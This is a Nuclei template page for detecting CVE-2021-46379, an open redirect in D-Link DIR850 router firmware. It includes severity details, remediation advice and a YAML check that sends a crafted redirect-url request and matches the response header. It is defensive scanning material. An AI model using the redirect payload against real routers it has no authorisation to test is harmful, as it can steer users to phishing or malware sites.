Skip to content
Nuclei Templates

D-Link DIR850 ET850-1.08TRb03 - Open Redirect

ID: CVE-2021-46379

Severity: medium

Author: 0x_Akoko

Tags: cve,cve2021,redirect,dlink,router

Description

Section titled “Description”

DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites.

YAML Source

Section titled “YAML Source”
id: CVE-2021-46379


info:
  name: D-Link DIR850 ET850-1.08TRb03 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
  remediation: |
    Apply the latest firmware update provided by D-Link to fix the open redirect vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46379
    - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view
    - https://www.dlink.com/en/security-bulletin
    - https://www.dlink.com/en/security-bulletin/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-46379
    cwe-id: CWE-601
    epss-score: 0.00306
    epss-percentile: 0.69219
    cpe: cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dlink
    product: dir-850l_firmware
  tags: cve,cve2021,redirect,dlink,router


http:
  - method: GET
    path:
      - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1'


    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a00473045022100b03d8eda378200b6acd32a23686da3caf15058d5f026299bdc39ab2273a0bb58022006ebeaeff443dc47418bba6d25586489027537a3f55a05d9f1bb8daeff7bb767:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-46379.yaml"

View on Github